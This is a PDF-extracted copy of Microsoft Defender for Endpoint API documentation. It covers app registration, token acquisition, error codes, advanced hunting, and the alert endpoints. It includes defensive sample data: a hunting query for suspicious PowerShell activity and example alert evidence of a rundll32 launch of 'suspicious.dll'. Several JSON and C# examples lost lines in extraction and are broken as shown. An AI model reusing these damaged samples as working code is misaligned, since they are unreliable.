permission to perform the action in the API.
Create an app
1. Log on to Azure with a user account that has the Global Administrator role.


3. When the Register an application page appears, enter your application's

registration information:
Name - Enter a meaningful application name that will be displayed to users

of the app.
Supported account types - Select which accounts you would like your
application to support.
ﾉ Expand table
Supported account types Description
Accounts in this Select this option if you're building a line-of-business

organizational directory (LOB) application. This option is not available if you're
only not registering the application in a directory.
This option maps to Microsoft Entra-only single-tenant.
This is the default option unless you're registering the

app outside of a directory. In cases where the app is
registered outside of a directory, the default is
Microsoft Entra multi-tenant and personal Microsoft
accounts.
Accounts in any Select this option if you would like to target all business
organizational directory and educational customers.
This option maps to a Microsoft Entra-only multi-
tenant.
If you registered the app as Microsoft Entra-only single-

tenant, you can update it to be Microsoft Entra multi-
tenant and back to single-tenant through the
Authentication blade.
Supported account types Description
Accounts in any Select this option to target the widest set of customers.
organizational directory This option maps to Microsoft Entra multi-tenant and
and personal Microsoft personal Microsoft accounts.
accounts
If you registered the app as Microsoft Entra multi-
tenant and personal Microsoft accounts, you cannot
change this in the UI. Instead, you must use the
application manifest editor to change the supported
account types.
Redirect URI (optional) - Select the type of app you're building, Web or
Public client (mobile & desktop), and then enter the redirect URI (or reply
URL) for your application.
For web applications, provide the base URL of your app. For example,
http://localhost:31544 might be the URL for a web app running on your
local machine. Users would use this URL to sign in to a web client
application.
For public client applications, provide the URI used by Microsoft Entra ID
to return token responses. Enter a value specific to your application, such
as myapp://auth .
To see specific examples for web applications or native applications, check

out our quickstarts.
When finished, select Register.
4. Allow your Application to access Microsoft Defender for Endpoint and assign it
'Read alerts' permission:
On your application page, select API Permissions > Add permission > APIs
my organization uses > type WindowsDefenderATP and select on
WindowsDefenderATP.
７ Note
WindowsDefenderATP does not appear in the original list. Start writing its
name in the text box to see it appear.

Choose Delegated permissions > Alert.Read > select Add permissions.
） Important
Select the relevant permissions. Read alerts is only an example.
For example:
To run advanced queries, select Run advanced queries permission.

To isolate a device, select Isolate machine permission.
To determine which permission you need, view the Permissions section in the
API you are interested to call.
Select Grant consent.
７ Note
Every time you add permission you must select on Grant consent for the
new permission to take effect.
5. Write down your application ID and your tenant ID.
On your application page, go to Overview and copy the following information:
Get an access token

For more information on Microsoft Entra tokens, see Microsoft Entra tutorial.
Using C#
Copy/Paste the below class in your application.
Use AcquireUserTokenAsync method with your application ID, tenant ID, user
name, and password to acquire a token.
C#
namespace WindowsDefenderATP
{
using System.Net.Http;
using System.Text;
using System.Threading.Tasks;
using Newtonsoft.Json.Linq;
public static class WindowsDefenderATPUtils

{
private const string Authority =
"https://login.microsoftonline.com";
private const string WdatpResourceId =

"https://api.securitycenter.microsoft.com";
public static async Task<string> AcquireUserTokenAsync(string

username, string password, string appId, string tenantId)
{
using (var httpClient = new HttpClient())
{
var urlEncodedBody = $"resource=
{WdatpResourceId}&client_id={appId}&grant_type=password&username=
{username}&password={password}";
var stringContent = new StringContent(urlEncodedBody,

Encoding.UTF8, "application/x-www-form-urlencoded");
using (var response = await httpClient.PostAsync($"

{Authority}/{tenantId}/oauth2/token",
stringContent).ConfigureAwait(false))
{
response.EnsureSuccessStatusCode();
var json = await

response.Content.ReadAsStringAsync().ConfigureAwait(false);
var jObject = JObject.Parse(json);
return jObject["access_token"].Value<string>();
}
}
}
}
}
Validate the token

Verify to make sure you got a correct token:
Copy/paste into JWT the token you got in the previous step in order to decode
it.
Validate you get a 'scp' claim with the desired app permissions.
In the screenshot below you can see a decoded token acquired from the app in the
tutorial:

Endpoint API
Choose the API you want to use - Supported Microsoft Defender for Endpoint
APIs.
Set the Authorization header in the HTTP request you send to "Bearer {token}"
(Bearer is the Authorization scheme).
The Expiration time of the token is 1 hour (you can send more than one request
with the same token).
Example of sending a request to get a list of alerts using C#:
C#


token);
See also
 Tip
Feedback

Supported Microsoft Defender for
Endpoint APIs
Article • 09/27/2023
Applies to:

） Important
Endpoint URI and versioning
Endpoint URI
The service base URI is: https://api.securitycenter.microsoft.com
The queries based OData have the '/api' prefix. For example, to get Alerts you can
send GET request to https://api.securitycenter.microsoft.com/api/alerts
Versioning
The API supports versioning.
The current version is V1.0.
To use a specific version, use this format:

https://api.securitycenter.microsoft.com/api/{Version} . For example:
https://api.securitycenter.microsoft.com/api/v1.0/alerts
If you don't specify any version (e.g.

https://api.securitycenter.microsoft.com/api/alerts ) you will get to the latest
version.
７ Note
 Tip
Learn more about the individual supported entities where you can run API calls to and
details such as HTTP request values, request headers and expected responses.
In this section
ﾉ Expand table
Topic Description
Advanced Hunting Run queries from API.

methods
Alert methods and Run API calls such as - get alerts, create alert, update alert and more.
properties
Export Assessment per- Run API calls to gather vulnerability assessments on a per-device
device methods and basis, such as: - export secure configuration assessment, export
properties software inventory assessment, export software vulnerabilities
assessment, and delta export software vulnerabilities assessment.
Automated Run API calls such as - get collection of Investigation.

investigation methods
and properties
Export device health Run API Calls such as - GET /api/public/avdeviceshealth.

methods and properties
Domain-related alerts Run API calls such as - get domain-related devices, domain statistics
and more.
Topic Description
File methods and Run API calls such as - get file information, file related alerts, file
properties related devices, and file statistics.
Indicators methods and Run API call such as - get Indicators, create Indicator, and delete
properties Indicators.
IP-related alerts Run API calls such as - get IP-related alerts and get IP statistics.
Machine methods and Run API calls such as - get devices, get devices by ID, information
properties about logged on users, edit tags and more.
Machine Action Run API call such as - Isolation, Run anti-virus scan and more.
Recommendation Run API calls such as - get recommendation by ID.

Remediation activity Run API call such as - get all remediation tasks, get exposed devices
methods and properties remediation task and get one remediation task by id.
Score methods and Run API calls such as - get exposure score or get device secure score.
properties
Software methods and Run API calls such as - list vulnerabilities by software.
properties
User methods and Run API calls such as - get user-related alerts and user-related devices.
properties
Vulnerability methods Run API calls such as - list devices by vulnerability.

and properties
See also
Microsoft Defender for Endpoint API release notes
 Tip
Feedback

Handling REST API errors
Article • 09/27/2023
HTTP error responses are divided into two categories:
Client error (400-code level) – the client sent an invalid request or the request isn't
in accordance with definitions.
Server error (500-level) – the server temporarily failed to fulfill the request or a
server error occurred. Try sending the HTTP request again.
The error codes listed in the following table may be returned by an operation on any of
Microsoft Defender for Endpoint APIs.
In addition to the error code, every error response contains an error message,
which can help resolve the problem.
The message is a free text that can be changed.
At the bottom of the page, you can find response examples.
Applies to:

ﾉ Expand table
Error code HTTP status Message

code
BadRequest BadRequest (400) General Bad Request error message.
ODataError BadRequest (400) Invalid OData URI query (the specific error is
specified).
InvalidInput BadRequest (400) Invalid input {the invalid input}.
InvalidRequestBody BadRequest (400) Invalid request body.
InvalidHashValue BadRequest (400) Hash value {the invalid hash} is invalid.
InvalidDomainName BadRequest (400) Domain name {the invalid domain} is invalid.
InvalidIpAddress BadRequest (400) IP address {the invalid IP} is invalid.
InvalidUrl BadRequest (400) URL {the invalid URL} is invalid.

Error code HTTP status Message
code
MaximumBatchSizeExceeded BadRequest (400) Maximum batch size exceeded. Received:

{batch size received}, allowed: {batch size
allowed}.
MissingRequiredParameter BadRequest (400) Parameter {the missing parameter} is missing.
OsPlatformNotSupported BadRequest (400) OS Platform {the client OS Platform} isn't

supported for this action.
ClientVersionNotSupported BadRequest (400) {The requested action} is supported on client

version {supported client version} and above.
Unauthorized Unauthorized Unauthorized (invalid or expired

(401) authorization header).
Forbidden Forbidden (403) Forbidden (valid token but insufficient

permission for the action).
DisabledFeature Forbidden (403) Tenant feature isn't enabled.
DisallowedOperation Forbidden (403) {the disallowed operation and the reason}.
NotFound Not Found (404) General Not Found error message.
ResourceNotFound Not Found (404) Resource {the requested resource} wasn't

found.
TooManyRequests Too Many Response represents reaching quota limit

Requests (429) either by number of requests or by CPU.
InternalServerError Internal Server (No error message, retry the operation.)

Error (500)
Throttling
The HTTP client may receive a 'Too Many Requests error (429)' when the number of
HTTP requests in a given time frame exceeds the allowed number of calls per API.
The HTTP client should delay resubmitting further HTTPS requests and then submit
them in a way that complies with the rate limitations. A Retry-After in the response
header indicating how long to wait (in seconds) before making a new request
Ignoring the 429 response or trying to resubmit HTTP requests in a shorter time frame
gives a return of the 429 error code.
Body parameters are case-sensitive
The submitted body parameters are currently case-sensitive.
If you experience an InvalidRequestBody or MissingRequiredParameter errors, it might

be caused from a wrong parameter capital or lower-case letter.
Review the API documentation page and check that the submitted parameters match
the relevant example.
Correlation request ID
Each error response contains a unique ID parameter for tracking.
The property name of this parameter is "target".
When contacting us about an error, attaching this ID helps find the root cause of the
problem.
Examples
JSON
{
"error": {
"code": "ResourceNotFound",
"message": "Machine 123123123 was not found",
"target": "43f4cb08-8fac-4b65-9db1-745c2ae65f3a"
}
}
JSON
{
"error": {
"code": "InvalidRequestBody",
"message": "Request body is incorrect",
"target": "1fa66c0f-18bd-4133-b378-36d76f3a2ba0"
}
}
 Tip
Feedback

Advanced hunting API
Article • 02/22/2024
Applies to:
２ Warning
This advanced hunting API is an older version with limited capabilities. A more
comprehensive version of the advanced hunting API that can query more tables is
already available in the Microsoft Graph security API. See Advanced hunting using
Microsoft Graph security API
７ Note
 Tip
Limitations
1. You can only run a query on data from the last 30 days.
2. The results include a maximum of 100,000 rows.
3. The number of executions is limited per tenant:

API calls: Up to 45 calls per minute, and up to 1,500 calls per hour.
Execution time: 10 minutes of running time every hour and 3 hours of
running time a day.
4. The maximal execution time of a single request is 200 seconds.
5. 429 response represents reaching quota limit either by number of requests or by

CPU. Read response body to understand what limit was reached.
6. The maximum query result size of a single request can't exceed 124 MB. If
exceeded, an HTTP 400 Bad Request with the message "Query execution has
exceeded the allowed result size. Optimize your query by limiting the number of
results and try again" occurs.
Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs
ﾉ Expand table
Application AdvancedQuery.Read.All Run advanced queries
Delegated (work or school account) AdvancedQuery.Read Run advanced queries
７ Note
When obtaining a token using user credentials:
The user needs to have the View Data role assigned in Microsoft Entra ID
The user needs to have access to the device, based on device group settings
(See Create and manage device groups for more information)
HTTP request
HTTP
POST https://api.securitycenter.microsoft.com/api/advancedqueries/run
Request headers
ﾉ Expand table
Header Value
Authorization Bearer {token}. Required.
Content-Type application/json
Request body
In the request body, supply a JSON object with the following parameters:
ﾉ Expand table
Query Text The query to run. Required.
Response
If successful, this method returns 200 OK, and QueryResponse object in the response
body.
Example
Request example
Here's an example of the request.
HTTP
POST https://api.securitycenter.microsoft.com/api/advancedqueries/run
JSON
{
"Query":"DeviceProcessEvents
|where InitiatingProcessFileName =~ 'powershell.exe'
|where ProcessCommandLine contains 'appdata'
|project Timestamp, FileName, InitiatingProcessFileName, DeviceId
|limit 2"
}
Response example
Here's an example of the response.
７ Note
The response object shown here may be truncated for brevity. All of the properties
will be returned from an actual call.
JSON
{
"Schema": [
{
"Name": "Timestamp",
"Type": "DateTime"
},
{
"Name": "FileName",
"Type": "String"
},
{
"Name": "InitiatingProcessFileName",
"Type": "String"
},
{
"Name": "DeviceId",
"Type": "String"
}
],
"Results": [
{
"Timestamp": "2020-02-05T01:10:26.2648757Z",
"FileName": "csc.exe",
"InitiatingProcessFileName": "powershell.exe",
"DeviceId": "10cbf9182d4e95660362f65cfa67c7731f62fdb3"
},
{
"Timestamp": "2020-02-05T01:10:26.5614772Z",
"FileName": "csc.exe",
"InitiatingProcessFileName": "powershell.exe",
"DeviceId": "10cbf9182d4e95660362f65cfa67c7731f62fdb3"
}
]
}
Related articles
Microsoft Defender for Endpoint APIs introduction
Advanced Hunting from Portal
Advanced Hunting using PowerShell
 Tip
Feedback

Alert resource type
Article • 02/22/2024
Applies to:
７ Note
For the full available Alerts API experience across all Microsoft Defenders' products,
visit: Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn.
７ Note
 Tip
Methods
ﾉ Expand table
Method Return Type Description
Get alert Alert Get a single alert object
List alerts Alert collection List alert collection

Update alert Alert Update specific alert
Batch update Update a batch of alerts

alerts
Create alert Alert Create an alert based on event data obtained from
Advanced Hunting
List related Domain List URLs associated with the alert

domains collection
List related files File collection List the file entities that are associated with the alert
List related IPs IP collection List IPs that are associated with the alert
Get related Machine The machine that is associated with the alert
machines
Get related users User The user that is associated with the alert
Properties
ﾉ Expand table
Property Type Description
ID String Alert ID.
title String Alert title.
description String Alert description.
alertCreationTime Nullable The date and time (in UTC) the alert was created.
DateTimeOffset
lastEventTime Nullable The last occurrence of the event that triggered the alert
DateTimeOffset on the same device.
firstEventTime Nullable The first occurrence of the event that triggered the alert
DateTimeOffset on that device.
lastUpdateTime Nullable The date and time (in UTC) the alert was last updated.
DateTimeOffset
resolvedTime Nullable The date and time in which the status of the alert was
DateTimeOffset changed to Resolved.
incidentId Nullable Long The Incident ID of the Alert.

investigationId Nullable Long The Investigation ID related to the Alert.
investigationState Nullable Enum The current state of the Investigation. Possible values
are: Unknown, Terminated, SuccessfullyRemediated,
Benign, Failed, PartiallyRemediated, Running,
PendingApproval, PendingResource, PartiallyInvestigated,
TerminatedByUser, TerminatedBySystem, Queued,
InnerFailure, PreexistingAlert, UnsupportedOs,
UnsupportedAlertType, SuppressedAlert.
assignedTo String Owner of the alert.
rbacGroupName String Role-based access control device group name.
mitreTechniques String Mitre Enterprise technique ID.
relatedUser String Details of user related to a specific alert.
severity Enum Severity of the alert. Possible values are: UnSpecified,

Informational, Low, Medium, and High.
status Enum Specifies the current status of the alert. Possible values
are: Unknown, New, InProgress and Resolved.
classification Nullable Enum Specification of the alert. Possible values are:

TruePositive , Informational, expected activity , and
FalsePositive .
determination Nullable Enum Specifies the determination of the alert.

Possible determination values for each classification are:
True positive: Multistage attack
(MultiStagedAttack), Malicious user activity
(MaliciousUserActivity), Compromised account
(CompromisedUser) – consider changing the enum
name in public API accordingly, Malware (Malware),
Phishing (Phishing), Unwanted software
(UnwantedSoftware), and Other (Other).
Informational, expected activity: Security test
(SecurityTesting), Line-of-business application
(LineOfBusinessApplication), Confirmed activity
(ConfirmedUserActivity) - consider changing the enum
name in public API accordingly, and Other (Other).
False positive: Not malicious (Clean) - consider
changing the enum name in public API accordingly, Not
enough data to validate (InsufficientData), and Other
(Other).
category String Category of the alert.

detectionSource String Detection source.
threatFamilyName String Threat family.
threatName String Threat name.
machineId String ID of a machine entity that is associated with the alert.
computerDnsName String machine fully qualified name.
aadTenantId String The Microsoft Entra ID.
detectorId String The ID of the detector that triggered the alert.
comments List of Alert Alert Comment object contains: comment string,

comments createdBy string, and createTime date time.
Evidence List of Alert Evidence related to the alert. See the following example.
evidence
７ Note
Around August 29, 2022, previously supported alert determination values (Apt and
SecurityPersonnel) will be deprecated and no longer available via the API.
Response example for getting single alert:

HTTP
GET
https://api.securitycenter.microsoft.com/api/alerts/da637472900382838869_136
4969609
JSON
{
"id": "da637472900382838869_1364969609",
"incidentId": 1126093,
"investigationId": null,
"assignedTo": null,
"severity": "Low",
"status": "New",
"classification": null,
"determination": null,
"investigationState": "Queued",
"detectionSource": "WindowsDefenderAtp",
"detectorId": "17e10bbc-3a68-474a-8aad-faef14d43952",
"category": "Execution",
"threatFamilyName": null,
"title": "Low-reputation arbitrary code executed by signed executable",
"description": "Binaries signed by Microsoft can be used to run low-
reputation arbitrary code. This technique hides the execution of malicious
code within a trusted process. As a result, the trusted process might
exhibit suspicious behaviors, such as opening a listening port or connecting
to a command-and-control (C&C) server.",
"alertCreationTime": "2021-01-26T20:33:57.7220239Z",
"firstEventTime": "2021-01-26T20:31:32.9562661Z",
"lastEventTime": "2021-01-26T20:31:33.0577322Z",
"lastUpdateTime": "2021-01-26T20:33:59.2Z",
"resolvedTime": null,
"machineId": "111e6dd8c833c8a052ea231ec1b19adaf497b625",
"computerDnsName": "temp123.middleeast.corp.microsoft.com",
"rbacGroupName": "A",
"aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
"threatName": null,
"mitreTechniques": [
"T1064",
"T1085",
"T1220"
],
"relatedUser": {
"userName": "temp123",
"domainName": "DOMAIN"
},
"comments": [
{
"comment": "test comment for docs",
"createdBy": "secop123@contoso.com",
"createdTime": "2021-01-26T01:00:37.8404534Z"
}
],
"evidence": [
{
"entityType": "User",
"evidenceCreationTime": "2021-01-26T20:33:58.42Z",
"sha1": null,
"sha256": null,
"fileName": null,
"filePath": null,
"processId": null,
"processCommandLine": null,
"processCreationTime": null,
"parentProcessId": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"ipAddress": null,
"url": null,
"registryKey": null,
"registryHive": null,
"registryValueType": null,
"registryValue": null,
"accountName": "name",
"domainName": "DOMAIN",
"userSid": "S-1-5-21-11111607-1111760036-109187956-75141",
"aadUserId": "11118379-2a59-1111-ac3c-a51eb4a3c627",
"userPrincipalName": "temp123@microsoft.com",
"detectionStatus": null
},
{
"entityType": "Process",
"sha1": "ff836cfb1af40252bd2a2ea843032e99a5b262ed",
"sha256":
"a4752c71d81afd3d5865d24ddb11a6b0c615062fcc448d24050c2172d2cbccd6",
"fileName": "rundll32.exe",
"filePath": "C:\\Windows\\SysWOW64",
"processId": 3276,
"processCommandLine": "rundll32.exe
c:\\temp\\suspicious.dll,RepeatAfterMe",
"processCreationTime": "2021-01-26T20:31:32.9581596Z",
"parentProcessId": 8420,
"parentProcessCreationTime": "2021-01-26T20:31:32.9004163Z",
"parentProcessFileName": "rundll32.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"ipAddress": null,
"url": null,
"accountName": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
"userPrincipalName": null,
"detectionStatus": "Detected"
},
{
"entityType": "File",
"sha1": "8563f95b2f8a284fc99da44500cd51a77c1ff36c",
"sha256":
"dc0ade0c95d6db98882bc8fa6707e64353cd6f7767ff48d6a81a6c2aef21c608",
"fileName": "suspicious.dll",
"filePath": "c:\\temp",
"processId": null,
"ipAddress": null,
"url": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
}
]
}
Related articles
 Tip
Feedback

List alerts API
Article • 02/22/2024
Applies to:

７ Note
 Tip
API description
Retrieves a collection of Alerts.
Supports OData V4 queries .
OData supported operators:
$filter on: alertCreationTime , lastUpdateTime , incidentId , InvestigationId , id ,
asssignedTo , detectionSource , lastEventTime , status , severity and category
properties.
$top with max value of 10,000
$skip
$expand of evidence
See examples at OData queries with Microsoft Defender for Endpoint.
Limitations
1. You can get alerts last updated according to your configured retention period.
2. Maximum page size is 10,000.
3. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
Permissions
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.
ﾉ Expand table
Application Alert.Read.All Read all alerts
Application Alert.ReadWrite.All Read and write all alerts
Delegated (work or school account) Alert.Read Read alerts
Delegated (work or school account) Alert.ReadWrite Read and write alerts
７ Note
The user needs to have at least the following role permission: View Data (See
Create and manage roles for more information)
The response includes only alerts that are associated with devices that the
user can access, based on device group settings (See Create and manage
device groups for more information)
HTTP request
HTTP
GET /api/alerts
Request headers
ﾉ Expand table
Name Type Description
Authorization String Bearer {token}. Required.
Request body
Empty
Response
If successful, this method returns 200 OK, and a list of alert objects in the response
body.
Example 1 - Default
Request
HTTP
GET https://api.securitycenter.microsoft.com/api/alerts
Response
７ Note
The response list shown here may be truncated for brevity. All alerts will be
returned from an actual call.
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Alerts",
"value": [
{
"id": "da637308392288907382_-880718168",
"incidentId": 7587,
"investigationId": 723156,
"assignedTo": "secop123@contoso.com",
"severity": "Low",
"status": "New",
"classification": "TruePositive",
"detectionSource": "WindowsDefenderAv",
"category": "SuspiciousActivity",
"threatFamilyName": "Meterpreter",
"title": "Suspicious 'Meterpreter' behavior was detected",
"description": "Malware and unwanted software are undesirable
applications that perform annoying, disruptive, or harmful actions on
affected machines. Some of these undesirable applications can replicate and
spread from one machine to another. Others are able to receive commands from
remote attackers and perform activities associated with cyber attacks.\n\nA
malware is considered active if it is found running on the machine or it
already has persistence mechanisms in place. Active malware detections are
assigned higher severity ratings.\n\nBecause this malware was active, take
precautionary measures and check for residual signs of infection.",
"machineId": "12ee6dd8c833c8a052ea231ec1b19adaf497b625",
"rbacGroupName": "MiddleEast",
"threatName": null,
"T1064",
"T1085",
"T1220"
],
"relatedUser": {
},
"comments": [
{
"createdTime": "2020-07-21T01:00:37.8404534Z"
}
],
"evidence": []
}
...
]
}
Example 2 - Get 10 latest Alerts with related

Evidence
Request
HTTP
GET https://api.securitycenter.microsoft.com/api/alerts?
$top=10&$expand=evidence
Response
７ Note
The response list shown here may be truncated for brevity. All alerts will be
returned from an actual call.
JSON
{
"@odata.context":
"value": [
{
"id": "da637472900382838869_1364969609",
"assignedTo": null,
"severity": "Low",
"status": "New",
"title": "Low-reputation arbitrary code executed by signed
executable",
"description": "Binaries signed by Microsoft can be used to run
low-reputation arbitrary code. This technique hides the execution of
malicious code within a trusted process. As a result, the trusted process
might exhibit suspicious behaviors, such as opening a listening port or
connecting to a command-and-control (C&C) server.",
"threatName": null,
"T1064",
"T1085",
"T1220"
],
"relatedUser": {
},
"comments": [
{
"createdTime": "2021-01-26T01:00:37.8404534Z"
}
],
"evidence": [
{
"sha1": null,
"sha256": null,
"fileName": null,
"filePath": null,
"processId": null,
"ipAddress": null,
"url": null,
"userSid": "S-1-5-21-11111607-1111760036-109187956-
75141",
},
{
"sha256":
"processId": 3276,
"parentProcessCreationTime": "2021-01-
26T20:31:32.9004163Z",
"ipAddress": null,
"url": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
},
{
"sha256":
"processId": null,
"ipAddress": null,
"url": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
}
]
},
...
]
}
See also
OData queries with Microsoft Defender for Endpoint
 Tip
Feedback

Create alert API
Article • 02/22/2024
Applies to:

７ Note
 Tip
API description
Creates new Alert on top of Event.
Microsoft Defender for Endpoint Event is required for the alert creation.
You need to supply three parameters from the Event in the request: Event Time,
Machine ID, and Report ID. See example below.
You can use an event found in Advanced Hunting API or Portal.
If there existing an open alert on the same Device with the same Title, the new
created alert is merged with it.
An automatic investigation starts automatically on alerts created via the API.
Limitations
1. Rate limitations for this API are 15 calls per minute.
Permissions
ﾉ Expand table
Application Alert.ReadWrite.All 'Read and write all alerts'
Delegated (work or school account) Alert.ReadWrite 'Read and write alerts'
７ Note
The user needs to have at least the following role permission: Alerts
investigation. For more information, see Create and manage roles.
The user needs to have access to the device associated with the alert, based
on device group settings. For more information, see Create and manage
device groups.
Device Group creation is supported in both Defender for Endpoint Plan 1 and Plan
2
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/api/alerts/CreateAlertByReference
Request headers
ﾉ Expand table
Content-Type String application/json. Required.
Request body
In the request body, supply the following values (all are required):
ﾉ Expand table
eventTime DateTime(UTC) The precise time of the event as string, as obtained from
advanced hunting. For example, 2018-08-
03T16:45:21.7115183Z Required.
reportId String The reportId of the event, as obtained from advanced

hunting. Required.
machineId String Id of the device on which the event was identified.

Required.
severity String Severity of the alert. The property values are: 'Low',
'Medium' and 'High'. Required.
title String Title for the alert. Required.
description String Description of the alert. Required.
recommendedAction String Security officer needs to take this action when analyzing
the alert. Required.
category String Category of the alert. The property values are: "General",
"CommandAndControl", "Collection", "CredentialAccess",
"DefenseEvasion", "Discovery", "Exfiltration", "Exploit",
"Execution", "InitialAccess", "LateralMovement",
"Malware", "Persistence", "PrivilegeEscalation",
"Ransomware", "SuspiciousActivity" Required.
Response
If successful, this method returns 200 OK, and a new alert object in the response body. If
event with the specified properties (reportId, eventTime and machineId) wasn't found -
404 Not Found.
Example
Request
HTTP
POST
https://api.securitycenter.microsoft.com/api/alerts/CreateAlertByReference
JSON
{
"machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"severity": "Low",
"title": "example",
"description": "example alert",
"recommendedAction": "nothing",
"eventTime": "2018-08-03T16:45:21.7115183Z",
"reportId": "20776",
"category": "Exploit"
}
 Tip
Feedback

Batch update alerts
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Updates properties of a batch of existing Alerts.
Submission of comment is available with or without updating properties.
Updatable properties are: status , determination , classification and assignedTo .
Limitations
1. You can update alerts that are available in the API. For more information, see List
Alerts.
2. Rate limitations for this API are 10 calls per minute and 500 calls per hour.
Permissions
ﾉ Expand table
７ Note
The user needs to have at least the following role permission: 'Alerts
investigation'. For more information, see Create and manage roles.
device groups.
HTTP request
HTTP
POST /api/alerts/batchUpdate
Request headers
ﾉ Expand table

Request body
In the request body, supply the IDs of the alerts to be updated and the values of the
relevant fields that you wish to update for these alerts.
Existing properties that aren't included in the request body will maintain their previous
values or be recalculated based on changes to other property values.
For best performance you shouldn't include existing values that haven't changed.
ﾉ Expand table
alertIds List<String> A list of the IDs of the alerts to be updated. Required
status String Specifies the updated status of the specified alerts. The property
values are: 'New', 'InProgress' and 'Resolved'.
assignedTo String Owner of the specified alerts
classification String Specifies the specification of the specified alerts. The property
values are: TruePositive , Informational, expected activity , and
FalsePositive .
determination String Specifies the determination of the specified alerts.

True positive: Multistage attack (MultiStagedAttack),
Malicious user activity (MaliciousUserActivity), Compromised
account (CompromisedUser) – consider changing the enum name
in public api accordingly, Malware (Malware), Phishing (Phishing),
Unwanted software (UnwantedSoftware), and Other (Other).
Informational, expected activity: Security test
(SecurityTesting), Line-of-business application
(LineOfBusinessApplication), Confirmed activity
(ConfirmedUserActivity) - consider changing the enum name in
public api accordingly, and Other (Other).
False positive: Not malicious (Clean) - consider changing the
enum name in public api accordingly, Not enough data to
validate (InsufficientData), and Other (Other).
comment String Comment to be added to the specified alerts.
７ Note
Around August 29, 2022, previously supported alert determination values ('Apt' and
'SecurityPersonnel') will be deprecated and no longer available via the API.
Response
If successful, this method returns 200 OK, with an empty response body.
Example
Request
HTTP
POST https://api.securitycenter.microsoft.com/api/alerts/batchUpdate
JSON
{
"alertIds": ["da637399794050273582_760707377",
"da637399989469816469_51697947354"],
"status": "Resolved",
"classification": "FalsePositive",
"determination": "Malware",
"comment": "Resolve my alert and assign to secop2"
}
 Tip
Feedback

Update alert
Article • 11/17/2023
Applies to:

７ Note
 Tip
API description
Updates properties of existing Alert.
Submission of comment is available with or without updating properties.
Updatable properties are: status , determination , classification , and assignedTo .
Limitations
1. You can update alerts that available in the API. For more information, see List
Alerts.
Permissions
ﾉ Expand table
Application Alerts.ReadWrite.All 'Read and write all alerts'
７ Note
investigation' (For more information, see Create and manage roles)
on device group settings (For more information, see Create and manage
device groups
HTTP request
HTTP
PATCH /api/alerts/{id}
Request headers
ﾉ Expand table

Request body
In the request body, supply the values for the relevant fields that should be updated.
For best performance, you shouldn't include existing values that haven't change.
ﾉ Expand table
Status String Specifies the current status of the alert. The property values are: 'New',
'InProgress' and 'Resolved'.
assignedTo String Owner of the alert
Classification String Specifies the specification of the alert. The property values are:
TruePositive , InformationalExpectedActivity , and FalsePositive .
Determination String Specifies the determination of the alert.

True positive: Multistage attack (MultiStagedAttack), Malicious
user activity (MaliciousUserActivity), Compromised account
(CompromisedUser) – consider changing the enum name in public api
accordingly, Malware (Malware), Phishing (Phishing), Unwanted software
(UnwantedSoftware), and Other (Other).
Informational, expected activity: Security test (SecurityTesting),
Line-of-business application (LineOfBusinessApplication), Confirmed
activity (ConfirmedActivity) - consider changing the enum name in
public api accordingly, and Other (Other).
False positive: Not malicious (NotMalicious) - consider changing the
enum name in public api accordingly, Not enough data to validate
(InsufficientData), and Other (Other).
Comment String Comment to be added to the alert.
７ Note
Around August 29, 2022, previously supported alert determination values ('Apt' and
'SecurityPersonnel') will be deprecated and no longer available via the API.
Response
If successful, this method returns 200 OK, and the alert entity in the response body with
the updated properties. If alert with the specified ID wasn't found - 404 Not Found.
Example
Request
HTTP
PATCH
https://api.securitycenter.microsoft.com/api/alerts/121688558380765161_21362
80442
JSON
{
"status": "Resolved",
"classification": "FalsePositive",
"determination": "Malware",
"comment": "Resolve my alert and assign to secop2"
}
 Tip
Feedback

Get alert information by ID API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves specific Alert by its ID.
Limitations
You can get alerts last updated according to your configured retention period.
Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
Permissions
ﾉ Expand table
Application Alert.Read.All 'Read all alerts'
Delegated (work or school account) Alert.Read 'Read alerts'
７ Note
The user needs to have at least the following role permission: 'View Data' (For
more information, see Create and manage roles)
device groups)
HTTP request
HTTP
GET /api/alerts/{id}
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK, and the alert entity in the response body. If an
alert with the specified ID wasn't found - 404 Not Found.
 Tip
Feedback

Get alert related domain information
API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves all domains related to a specific alert.
Limitations
1. You can query on alerts last updated according to your configured retention
period.
Permissions
ﾉ Expand table
Application URL.Read.All 'Read URLs'
Delegated (work or school account) URL.Read.All 'Read URLs'
７ Note
device groups)
HTTP request
HTTP
GET /api/alerts/{id}/domains
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and alert and domain exist - 200 OK. If alert not found - 404 Not Found.
Example
Request
HTTP
GET
https://api.securitycenter.microsoft.com/alerts/636688558380765161_213628044
2/domains
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/$metadata#Domains",
"value": [
{
"host": "www.example.com"
},
{
"host": "www.example2.com"
}
...
]
}
 Tip
Feedback

Get alert related files information API
Article • 11/15/2023
Applies to:

Want to experience Microsoft Defender for Endpoint? Sign up for free trial.
７ Note
 Tip
API description
Retrieves all files related to a specific alert.
Limitations
period.
Permissions
ﾉ Expand table
Application File.Read.All 'Read file profiles'
Delegated (work or school account) File.Read.All 'Read file profiles'
７ Note
The user needs to have at least the following role permission: 'View Data' (See
on device group settings (See Create and manage device groups for more
information)
HTTP request
HTTP
GET /api/alerts/{id}/files
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and alert and files exist - 200 OK. If alert not found - 404 Not Found.
Example
Request example
